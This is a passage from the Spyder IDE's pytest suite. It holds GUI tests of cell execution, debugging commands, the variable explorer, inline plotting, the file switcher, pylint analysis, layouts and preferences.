Qt.Key_Return, modifier=Qt.AltModifier) # Wait until the object has appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1, timeout=EVAL_TIMEOUT) assert shell.get_value('li') == [1, 2, 3] # ---- Closing test file ---- main_window.editor.close_file() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS") @pytest.mark.parametrize('main_window', [{'spy_config': ('editor', 'run_cell_copy', True)}], indirect=True) def test_run_cell_copy(main_window, qtbot, tmpdir): """Test all the different ways we have to run code""" # ---- Setup ---- p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误") .join(u"runtest's file èáïü Øαôå 字分误.py")) filepath = to_text_string(p) shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath) # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Make sure run_cell_copy is properly set for editorstack in main_window.editor.editorstacks: editorstack.set_run_cell_copy(True) # Load test file main_window.editor.load(filepath) # Move to the editor's first line code_editor = main_window.editor.get_focus_widget() code_editor.setFocus() qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier) # Get a reference to the namespace browser widget nsb = main_window.variableexplorer.current_widget() # ---- Run cell and advance ---- # Run the three cells present in file for _ in range(4): qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.wait(500) # Check for errors and the copied code assert 'runcell' not in shell._control.toPlainText() assert 'a = 10' in shell._control.toPlainText() assert 'Error:' not in shell._control.toPlainText() # Wait until all objects have appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4, timeout=EVAL_TIMEOUT) # Verify result assert ']: 10\n' in shell._control.toPlainText() assert shell.get_value('a') == 10 assert shell.get_value('s') == "Z:\\escape\\test\\string\n" assert shell.get_value('li') == [1, 2, 3] assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3])) # ---- Closing test file and reset config ---- main_window.editor.close_file() CONF.set('editor', 'run_cell_copy', False) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(running_in_ci(), reason="Fails on CIs") def test_open_files_in_new_editor_window(main_window, qtbot): """ This tests that opening files in a new editor window is working as expected. Test for spyder-ide/spyder#4085. """ # Set a timer to manipulate the open dialog while it's running QTimer.singleShot(2000, lambda: open_file_in_editor(main_window, 'script.py', directory=LOCATION)) # Create a new editor window # Note: editor.load() uses the current editorstack by default main_window.editor.create_new_window() main_window.editor.load() # Perform the test # Note: There's always one file open in the Editor editorstack = main_window.editor.get_current_editorstack() assert editorstack.get_stack_count() == 2 @pytest.mark.slow @flaky(max_runs=3) def test_close_when_file_is_changed(main_window, qtbot): """Test closing spyder when there is a file with modifications open.""" # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Load test file test_file = osp.join(LOCATION, 'script.py') main_window.editor.load(test_file) editorstack = main_window.editor.get_current_editorstack() editor = editorstack.get_current_editor() editor.document().setModified(True) # Wait for the segfault qtbot.wait(3000) @pytest.mark.slow @flaky(max_runs=3) def test_maximize_minimize_plugins(main_window, qtbot): """Test that the maximize button is working correctly.""" # Set focus to the Editor main_window.editor.get_focus_widget().setFocus() # Click the maximize button max_action = main_window.layouts.maximize_action max_button = main_window.main_toolbar.widgetForAction(max_action) qtbot.mouseClick(max_button, Qt.LeftButton) # Verify that the Editor is maximized assert main_window.editor._ismaximized # Verify that the action minimizes the plugin too qtbot.mouseClick(max_button, Qt.LeftButton) assert not main_window.editor._ismaximized @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt' or running_in_ci() and PYQT_VERSION >= '5.9', reason="It times out on Windows and segfaults in our CIs with PyQt >= 5.9") def test_issue_4066(main_window, qtbot): """ Test for a segfault when these steps are followed: 1. Open an object present in the Variable Explorer (e.g. a list). 2. Delete that object in its corresponding console while its editor is still open. 3. Closing that editor by pressing its *Ok* button. """ # Create the object shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) with qtbot.waitSignal(shell.executed): shell.execute('myobj = [1, 2, 3]') # Open editor associated with that object and get a reference to it nsb = main_window.variableexplorer.current_widget() qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT) nsb.editor.setFocus() nsb.editor.edit_item() obj_editor_id = list(nsb.editor.delegate._editors.keys())[0] obj_editor = nsb.editor.delegate._editors[obj_editor_id]['editor'] # Move to the IPython console and delete that object main_window.ipyconsole.get_widget().get_focus_widget().setFocus() with qtbot.waitSignal(shell.executed): shell.execute('del myobj') qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT) # Close editor ok_widget = obj_editor.btn_close qtbot.mouseClick(ok_widget, Qt.LeftButton) # Wait for the segfault qtbot.wait(3000) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows") def test_varexp_edit_inline(main_window, qtbot): """ Test for errors when editing inline values in the Variable Explorer and then moving to another plugin. Note: Errors for this test don't appear related to it but instead they are shown down the road. That's because they are generated by an async C++ RuntimeError. """ # Create object shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) with qtbot.waitSignal(shell.executed): shell.execute('a = 10') # Edit object main_window.variableexplorer.change_visibility(True) nsb = main_window.variableexplorer.current_widget() qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT) nsb.editor.setFocus() nsb.editor.edit_item() # Change focus to IPython console main_window.ipyconsole.get_widget().get_focus_widget().setFocus() # Wait for the error qtbot.wait(3000) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(not sys.platform.startswith('linux'), reason="It times out sometimes on Windows and macOS") def test_c_and_n_pdb_commands(main_window, qtbot): """Test that c and n Pdb commands update the Variable Explorer.""" nsb = main_window.variableexplorer.current_widget() # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() control = shell._control qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # Load test file test_file = osp.join(LOCATION, 'script.py') main_window.editor.load(test_file) # Click the debug button debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) # Set a breakpoint code_editor = main_window.editor.get_focus_widget() code_editor.debugger.toogle_breakpoint(line_number=6) qtbot.wait(500) # Verify that c works with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!c') qtbot.keyClick(control, Qt.Key_Enter) qtbot.waitUntil( lambda: nsb.editor.source_model.rowCount() == 1) # Verify that n works with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!n') qtbot.keyClick(control, Qt.Key_Enter) qtbot.waitUntil( lambda: nsb.editor.source_model.rowCount() == 2) # Verify that doesn't go to sitecustomize.py with next and stops # the debugging session. with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!n') qtbot.keyClick(control, Qt.Key_Enter) with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!n') qtbot.keyClick(control, Qt.Key_Enter) qtbot.waitUntil( lambda: nsb.editor.source_model.rowCount() == 3) with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!n') qtbot.keyClick(control, Qt.Key_Enter) with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!n') qtbot.keyClick(control, Qt.Key_Enter) with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!n') qtbot.keyClick(control, Qt.Key_Enter) # Assert that the prompt appear shell.clear_console() assert 'In [2]:' in control.toPlainText() # Remove breakpoint and close test file main_window.editor.clear_all_breakpoints() main_window.editor.close_file() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows") def test_stop_dbg(main_window, qtbot): """Test that we correctly stop a debugging session.""" # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # Load test file test_file = osp.join(LOCATION, 'script.py') main_window.editor.load(test_file) # Click the debug button debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) # Move to the next line with qtbot.waitSignal(shell.executed): shell.pdb_execute("!n") # Stop debugging stop_debug_action = main_window.debug_toolbar_actions[5] stop_debug_button = main_window.debug_toolbar.widgetForAction(stop_debug_action) with qtbot.waitSignal(shell.executed): qtbot.mouseClick(stop_debug_button, Qt.LeftButton) # Assert there are only two ipdb prompts in the console assert shell._control.toPlainText().count('IPdb') == 2 # Remove breakpoint and close test file main_window.editor.clear_all_breakpoints() main_window.editor.close_file() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(not sys.platform.startswith('linux'), reason="It only works on Linux") def test_change_cwd_dbg(main_window, qtbot): """ Test that using the Working directory toolbar is working while debugging. """ # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Load test file to be able to enter in debugging mode test_file = osp.join(LOCATION, 'script.py') main_window.editor.load(test_file) # Give focus to the widget that's going to receive clicks control = main_window.ipyconsole.get_widget().get_focus_widget() control.setFocus() # Click the debug button debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) qtbot.mouseClick(debug_button, Qt.LeftButton) qtbot.wait(1000) # Set LOCATION as cwd main_window.workingdirectory.chdir(tempfile.gettempdir()) qtbot.wait(1000) print(repr(control.toPlainText())) shell.clear_console() qtbot.wait(500) # Get cwd in console qtbot.keyClicks(control, 'import os; os.getcwd()') qtbot.keyClick(control, Qt.Key_Enter) qtbot.wait(1000) # Assert cwd is the right one assert tempfile.gettempdir() in control.toPlainText() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt', reason="Times out sometimes") def test_varexp_magic_dbg(main_window, qtbot): """Test that %varexp is working while debugging.""" nsb = main_window.variableexplorer.current_widget() # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Load test file to be able to enter in debugging mode test_file = osp.join(LOCATION, 'script.py') main_window.editor.load(test_file) # Give focus to the widget that's going to receive clicks control = main_window.ipyconsole.get_widget().get_focus_widget() control.setFocus() # Click the debug button debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) # Get to an object that can be plotted for _ in range(3): with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!n') qtbot.keyClick(control, Qt.Key_Enter) # Generate the plot from the Variable Explorer nsb.editor.plot('li', 'plot') qtbot.wait(1000) # Assert that there's a plot in the console assert shell._control.toHtml().count('img src') == 1 @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(PY2, reason="It times out sometimes") @pytest.mark.parametrize( 'main_window', [{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 1)}, {'spy_config': ('ipython_console', 'pylab/inline/figure_format', 0)}], indirect=True) def test_plots_plugin(main_window, qtbot, tmpdir, mocker): """ Test that plots generated in the IPython console are properly displayed in the plots plugin. """ assert CONF.get('plots', 'mute_inline_plotting') is False shell = main_window.ipyconsole.get_current_shellwidget() figbrowser = main_window.plots.current_widget() # Wait until the window is fully up. qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Generate a plot inline. with qtbot.waitSignal(shell.executed): shell.execute(("import matplotlib.pyplot as plt\n" "fig = plt.plot([1, 2, 3, 4], '.')\n")) if CONF.get('ipython_console', 'pylab/inline/figure_format') == 0: assert figbrowser.figviewer.figcanvas.fmt == 'image/png' else: assert figbrowser.figviewer.figcanvas.fmt == 'image/svg+xml' # Get the image name from the html, fetch the image from the shell, and # save it as a png. html = shell._control.toHtml() img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1) ipython_figname = osp.join(to_text_string(tmpdir), 'ipython_img.png') ipython_qimg = shell._get_image(img_name) ipython_qimg.save(ipython_figname) # Save the image with the Plots plugin as a png. plots_figname = osp.join(to_text_string(tmpdir), 'plots_img.png') mocker.patch('spyder.plugins.plots.widgets.figurebrowser.getsavefilename', return_value=(plots_figname, '.png')) figbrowser.save_figure() assert compare_images(ipython_figname, plots_figname, 0.1) is None @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif( (parse_version(ipy_release.version) >= parse_version('7.23.0') and parse_version(ipykernel.__version__) <= parse_version('5.5.3')), reason="Fails due to a bug in the %matplotlib magic") def test_tight_layout_option_for_inline_plot(main_window, qtbot, tmpdir): """ Test that the option to set bbox_inches to 'tight' or 'None' is working when plotting inline in the IPython console. By default, figures are plotted inline with bbox_inches='tight'. """ tmpdir = to_text_string(tmpdir) # Assert that the default is True. assert CONF.get('ipython_console', 'pylab/inline/bbox_inches') is True fig_dpi = float(CONF.get('ipython_console', 'pylab/inline/resolution')) fig_width = float(CONF.get('ipython_console', 'pylab/inline/width')) fig_height = float(CONF.get('ipython_console', 'pylab/inline/height')) # Wait until the window is fully up. shell = main_window.ipyconsole.get_current_shellwidget() client = main_window.ipyconsole.get_current_client() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Give focus to the widget that's going to receive clicks control = main_window.ipyconsole.get_widget().get_focus_widget() control.setFocus() # Generate a plot inline with bbox_inches=tight (since it is default) and # save the figure with savefig. savefig_figname = osp.join( tmpdir, 'savefig_bbox_inches_tight.png').replace('\\', '/') with qtbot.waitSignal(shell.executed): shell.execute(("import matplotlib.pyplot as plt\n" "fig, ax = plt.subplots()\n" "fig.set_size_inches(%f, %f)\n" "ax.set_position([0.25, 0.25, 0.5, 0.5])\n" "ax.set_xticks(range(10))\n" "ax.xaxis.set_ticklabels([])\n" "ax.set_yticks(range(10))\n" "ax.yaxis.set_ticklabels([])\n" "ax.tick_params(axis='both', length=0)\n" "for loc in ax.spines:\n" " ax.spines[loc].set_color('#000000')\n" " ax.spines[loc].set_linewidth(2)\n" "ax.axis([0, 9, 0, 9])\n" "ax.plot(range(10), color='#000000', lw=2)\n" "fig.savefig('%s',\n" " bbox_inches='tight',\n" " dpi=%f)" ) % (fig_width, fig_height, savefig_figname, fig_dpi)) # Get the image name from the html, fetch the image from the shell, and # then save it to a file. html = shell._control.toHtml() img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1) qimg = shell._get_image(img_name) assert isinstance(qimg, QImage) # Save the inline figure and assert it is similar to the one generated # with savefig. inline_figname = osp.join(tmpdir, 'inline_bbox_inches_tight.png') qimg.save(inline_figname) assert compare_images(savefig_figname, inline_figname, 0.1) is None # Change the option so that bbox_inches=None. CONF.set('ipython_console', 'pylab/inline/bbox_inches', False) # Restart the kernel and wait until it's up again shell._prompt_html = None client.restart_kernel() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Generate the same plot inline with bbox_inches='tight' and save the # figure with savefig. savefig_figname = osp.join( tmpdir, 'savefig_bbox_inches_None.png').replace('\\', '/') with qtbot.waitSignal(shell.executed): shell.execute(("import matplotlib.pyplot as plt\n" "fig, ax = plt.subplots()\n" "fig.set_size_inches(%f, %f)\n" "ax.set_position([0.25, 0.25, 0.5, 0.5])\n" "ax.set_xticks(range(10))\n" "ax.xaxis.set_ticklabels([])\n" "ax.set_yticks(range(10))\n" "ax.yaxis.set_ticklabels([])\n" "ax.tick_params(axis='both', length=0)\n" "for loc in ax.spines:\n" " ax.spines[loc].set_color('#000000')\n" " ax.spines[loc].set_linewidth(2)\n" "ax.axis([0, 9, 0, 9])\n" "ax.plot(range(10), color='#000000', lw=2)\n" "fig.savefig('%s',\n" " bbox_inches=None,\n" " dpi=%f)" ) % (fig_width, fig_height, savefig_figname, fig_dpi)) # Get the image name from the html, fetch the image from the shell, and # then save it to a file. html = shell._control.toHtml() img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1) qimg = shell._get_image(img_name) assert isinstance(qimg, QImage) # Save the inline figure and assert it is similar to the one generated # with savefig. inline_figname = osp.join(tmpdir, 'inline_bbox_inches_None.png') qimg.save(inline_figname) assert compare_images(savefig_figname, inline_figname, 0.1) is None # FIXME: Make this test work again in our CIs (it's passing locally) @pytest.mark.skip @flaky(max_runs=3) @pytest.mark.slow @pytest.mark.use_introspection def test_switcher(main_window, qtbot, tmpdir): """Test the use of shorten paths when necessary in the switcher.""" switcher = main_window.switcher # Assert that the full path of a file is shown in the switcher file_a = tmpdir.join('test_file_a.py') file_a.write(''' def example_def(): pass def example_def_2(): pass ''') main_window.editor.load(str(file_a)) main_window.open_switcher() switcher_paths = [switcher.model.item(item_idx).get_description() for item_idx in range(switcher.model.rowCount())] assert osp.dirname(str(file_a)) in switcher_paths or len(str(file_a)) > 75 switcher.close() # Assert that long paths are shortened in the switcher dir_b = tmpdir for _ in range(3): dir_b = dir_b.mkdir(str(uuid.uuid4())) file_b = dir_b.join('test_file_b.py') file_b.write('bar\n') main_window.editor.load(str(file_b)) main_window.open_switcher() file_b_text = switcher.model.item( switcher.model.rowCount() - 1).get_description() assert '...' in file_b_text switcher.close() # Assert search works correctly search_texts = ['test_file_a', 'file_b', 'foo_spam'] expected_paths = [file_a, file_b, None] for search_text, expected_path in zip(search_texts, expected_paths): main_window.open_switcher() qtbot.keyClicks(switcher.edit, search_text) qtbot.wait(200) assert switcher.count() == bool(expected_path) switcher.close() # Assert symbol switcher works main_window.editor.set_current_filename(str(file_a)) code_editor = main_window.editor.get_focus_widget() with qtbot.waitSignal( code_editor.completions_response_signal, timeout=30000): code_editor.document_did_open() with qtbot.waitSignal( code_editor.completions_response_signal, timeout=30000): code_editor.request_symbols() qtbot.wait(9000) main_window.open_switcher() qtbot.keyClicks(switcher.edit, '@') qtbot.wait(200) assert switcher.count() == 2 switcher.close() @flaky(max_runs=3) @pytest.mark.slow def test_edidorstack_open_switcher_dlg(main_window, tmpdir): """ Test that the file switcher is working as expected when called from the editorstack. Regression test for spyder-ide/spyder#10684 """ # Add a file to the editor. file = tmpdir.join('test_file_open_switcher_dlg.py') file.write("a test file for test_edidorstack_open_switcher_dlg") main_window.editor.load(str(file)) # Test that the file switcher opens as expected from the editorstack. editorstack = main_window.editor.get_current_editorstack() assert editorstack.switcher_dlg is None editorstack.open_switcher_dlg() assert editorstack.switcher_dlg assert editorstack.switcher_dlg.isVisible() assert (editorstack.switcher_dlg.count() == len(main_window.editor.get_filenames())) @flaky(max_runs=3) @pytest.mark.slow @pytest.mark.use_introspection @pytest.mark.skipif(not sys.platform.startswith('linux'), reason="It times out too much on Windows and macOS") def test_editorstack_open_symbolfinder_dlg(main_window, qtbot, tmpdir): """ Test that the symbol finder is working as expected when called from the editorstack. Regression test for spyder-ide/spyder#10684 """ # Add a file to the editor. file = tmpdir.join('test_file.py') file.write(''' def example_def(): pass def example_def_2(): pass ''') main_window.editor.load(str(file)) code_editor = main_window.editor.get_focus_widget() with qtbot.waitSignal( code_editor.completions_response_signal, timeout=30000): code_editor.document_did_open() with qtbot.waitSignal( code_editor.completions_response_signal, timeout=30000): code_editor.request_symbols() qtbot.wait(5000) # Test that the symbol finder opens as expected from the editorstack. editorstack = main_window.editor.get_current_editorstack() assert editorstack.switcher_dlg is None editorstack.open_symbolfinder_dlg() assert editorstack.switcher_dlg assert editorstack.switcher_dlg.isVisible() assert editorstack.switcher_dlg.count() == 2 @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform == 'darwin', reason="Times out sometimes on macOS") def test_run_static_code_analysis(main_window, qtbot): """This tests that the Pylint plugin is working as expected.""" from spyder.plugins.pylint.main_widget import PylintWidgetActions # Select the third-party plugin pylint_plugin = main_window.get_plugin(Plugins.Pylint) # Do an analysis test_file = osp.join(LOCATION, 'script_pylint.py') main_window.editor.load(test_file) pylint_plugin.get_action(PylintWidgetActions.RunCodeAnalysis).trigger() qtbot.wait(3000) # Perform the test # Check output of the analysis treewidget = pylint_plugin.get_widget().get_focus_widget() qtbot.waitUntil(lambda: treewidget.results is not None, timeout=SHELL_TIMEOUT) result_content = treewidget.results assert result_content['C:'] pylint_version = parse_version(pylint.__version__) if pylint_version < parse_version('2.5.0'): number_of_conventions = 5 else: number_of_conventions = 3 assert len(result_content['C:']) == number_of_conventions # Close the file main_window.editor.close_file() @flaky(max_runs=3) @pytest.mark.slow def test_troubleshooting_menu_item_and_url(main_window, qtbot, monkeypatch): """Test that the troubleshooting menu item calls the valid URL.""" application_plugin = main_window.application MockQDesktopServices = Mock() mockQDesktopServices_instance = MockQDesktopServices() attr_to_patch = ('spyder.utils.qthelpers.QDesktopServices') monkeypatch.setattr(attr_to_patch, MockQDesktopServices) # Unit test of help menu item: Make sure the correct URL is called. application_plugin.trouble_action.trigger() assert MockQDesktopServices.openUrl.call_count == 1 mockQDesktopServices_instance.openUrl.called_once_with(__trouble_url__) @flaky(max_runs=3) @pytest.mark.slow @pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows") def test_help_opens_when_show_tutorial_full(main_window, qtbot): """ Test fix for spyder-ide/spyder#6317. 'Show tutorial' opens the help plugin if closed. """ HELP_STR = "Help" help_pane_menuitem = None for action in main_window.layouts.plugins_menu.get_actions(): if action.text() == HELP_STR: help_pane_menuitem = action break # Test opening tutorial with Help plugin closed main_window.help.toggle_view_action.setChecked(False) qtbot.wait(500) help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window) assert help_tabbar is None and help_index is None assert not isinstance(main_window.focusWidget(), ObjectComboBox) assert not help_pane_menuitem.isChecked() main_window.help.show_tutorial() qtbot.wait(500) help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window) assert None not in (help_tabbar, help_index) assert help_index == help_tabbar.currentIndex() assert help_pane_menuitem.isChecked() # Test opening tutorial with help plugin open, but not selected help_tabbar.setCurrentIndex((help_tabbar.currentIndex() + 1) % help_tabbar.count()) qtbot.wait(500) help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window) assert None not in (help_tabbar, help_index) assert help_index != help_tabbar.currentIndex() assert help_pane_menuitem.isChecked() main_window.help.show_tutorial() qtbot.wait(500) help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window) assert None not in (help_tabbar, help_index) assert help_index == help_tabbar.currentIndex() assert help_pane_menuitem.isChecked() # Test opening tutorial with help plugin open and the active tab qtbot.wait(500) main_window.help.show_tutorial() help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window) qtbot.wait(500) assert None not in (help_tabbar, help_index) assert help_index == help_tabbar.currentIndex() assert help_pane_menuitem.isChecked() @pytest.mark.slow @flaky(max_runs=3) def test_report_issue(main_window, qtbot): """Test that the report error dialog opens correctly.""" main_window.console.report_issue() qtbot.wait(300) assert main_window.console.get_widget()._report_dlg is not None assert main_window.console.get_widget()._report_dlg.isVisible() assert main_window.console.get_widget()._report_dlg.close() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif( sys.platform.startswith('linux'), reason="It segfaults on Linux") def test_custom_layouts(main_window, qtbot): """Test that layout are showing the expected widgets visible.""" mw = main_window mw.first_spyder_run = False prefix = 'window' + '/' settings = mw.layouts.load_window_settings(prefix=prefix, default=True) # Test layout changes for layout_idx in get_class_values(DefaultLayouts): with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000): layout = mw.layouts.setup_default_layouts( layout_idx, settings=settings) qtbot.wait(500) for area in layout._areas: if area['visible']: for plugin_id in area['plugin_ids']: if plugin_id not in area['hidden_plugin_ids']: plugin = mw.get_plugin(plugin_id) print(plugin) # spyder: test-skip try: # New API assert plugin.get_widget().isVisible() except AttributeError: # Old API assert plugin.isVisible() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(not running_in_ci() or sys.platform.startswith('linux'), reason="Only runs in CIs and fails on Linux sometimes") def test_programmatic_custom_layouts(main_window, qtbot): """ Test that a custom layout gets registered and it is recognized.""" mw = main_window mw.first_spyder_run = False # Test layout registration layout_id = 'testing layout' # Test the testing plugin is being loaded mw.get_plugin('spyder_boilerplate') # Get the registered layout layout = mw.layouts.get_layout(layout_id) with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000): mw.layouts.quick_layout_switch(layout_id) qtbot.wait(500) for area in layout._areas: if area['visible']: for plugin_id in area['plugin_ids']: if plugin_id not in area['hidden_plugin_ids']: plugin = mw.get_plugin(plugin_id) print(plugin) # spyder: test-skip try: # New API assert plugin.get_widget().isVisible() except AttributeError: # Old API assert plugin.isVisible() @pytest.mark.slow @flaky(max_runs=3) def test_save_on_runfile(main_window, qtbot): """Test that layout are showing the expected widgets visible.""" # Load test file test_file = osp.join(LOCATION, 'script.py') test_file_copy = test_file[:-3] + '_copy.py' shutil.copyfile(test_file, test_file_copy) main_window.editor.load(test_file_copy) code_editor = main_window.editor.get_focus_widget() # Verify result shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) qtbot.keyClicks(code_editor, 'test_var = 123', delay=100) filename = code_editor.filename with qtbot.waitSignal(shell.sig_prompt_ready): shell.execute('runfile("{}")'.format(remove_backslashes(filename))) assert shell.get_value('test_var') == 123 main_window.editor.close_file() os.remove(test_file_copy) @pytest.mark.slow @pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS") def test_pylint_follows_file(qtbot, tmpdir, main_window): """Test that file editor focus change updates pylint combobox filename.""" pylint_plugin = main_window.get_plugin(Plugins.Pylint) # Show pylint plugin pylint_plugin.dockwidget.show() pylint_plugin.dockwidget.raise_() # Create base temporary directory basedir = tmpdir.mkdir('foo') # Open some files for idx in range(2): fh = basedir.join('{}.py'.format(idx)) fname = str(fh) fh.write('print("Hello world!")') main_window.open_file(fh) qtbot.wait(200) assert fname == pylint_plugin.get_filename() # Create a editor split main_window.editor.editorsplitter.split(orientation=Qt.Vertical) qtbot.wait(500) # Open other files for idx in range(4): fh = basedir.join('{}.py'.format(idx)) fh.write('print("Hello world!")') fname = str(fh) main_window.open_file(fh) qtbot.wait(200) assert fname == pylint_plugin.get_filename() # Close split panel for editorstack in reversed(main_window.editor.editorstacks): editorstack.close_split() break qtbot.wait(1000) @pytest.mark.slow @flaky(max_runs=3) def test_report_comms_error(qtbot, main_window): """Test if a comms error is correctly displayed.""" CONF.set('main', 'show_internal_errors', True) shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Create a bogus get_cwd with qtbot.waitSignal(shell.executed): shell.execute('def get_cwd(): import foo') with qtbot.waitSignal(shell.executed): shell.execute("get_ipython().kernel.frontend_comm." "register_call_handler('get_cwd', get_cwd)") with qtbot.waitSignal(shell.executed, timeout=3000): shell.execute('ls') qtbot.waitUntil(lambda: main_window.console.error_dialog is not None, timeout=EVAL_TIMEOUT) error_dialog = main_window.console.error_dialog assert 'Exception in comms call get_cwd' in error_dialog.error_traceback assert 'No module named' in error_dialog.error_traceback main_window.console.close_error_dialog() CONF.set('main', 'show_internal_errors', False) @pytest.mark.slow @flaky(max_runs=3) def test_break_while_running(main_window, qtbot, tmpdir): """Test that we can set breakpoints while running.""" # Create loop code = ("import time\n" "for i in range(100):\n" " print(i)\n" " time.sleep(0.1)\n" ) p = tmpdir.join("loop_script.py") p.write(code) test_file = to_text_string(p) # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Main variables debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) # Load test file main_window.editor.load(test_file) code_editor = main_window.editor.get_focus_widget() # Clear all breakpoints main_window.editor.clear_all_breakpoints() # Click the debug button with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) qtbot.wait(1000) # Continue debugging qtbot.keyClicks(shell._control, '!c') qtbot.keyClick(shell._control, Qt.Key_Enter) qtbot.wait(500) with qtbot.waitSignal(shell.executed): # Set a breakpoint code_editor.debugger.toogle_breakpoint(line_number=3) # We should drop into the debugger with qtbot.waitSignal(shell.executed): qtbot.keyClicks(shell._control, '!q') qtbot.keyClick(shell._control, Qt.Key_Enter) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # --- Preferences # ---------------------------------------------------------------------------- def preferences_dialog_helper(qtbot, main_window, section): """ Open preferences dialog and select page with `section` (CONF_SECTION). """ main_window.show_preferences() preferences = main_window.preferences container = preferences.get_container() qtbot.waitUntil(lambda: container.dialog is not None, timeout=5000) dlg = container.dialog index = dlg.get_index_by_name(section) page = dlg.get_page(index) dlg.set_current_index(index) return dlg, index, page @pytest.mark.slow def test_preferences_run_section_exists(main_window, qtbot): """ Test for spyder-ide/spyder#13524 regression. Ensure the Run section exists. """ assert preferences_dialog_helper(qtbot, main_window, 'run') @pytest.mark.slow def test_preferences_checkboxes_not_checked_regression(main_window, qtbot): """ Test for spyder-ide/spyder/#10139 regression. Enabling codestyle/docstyle on the completion section of preferences, was not updating correctly. 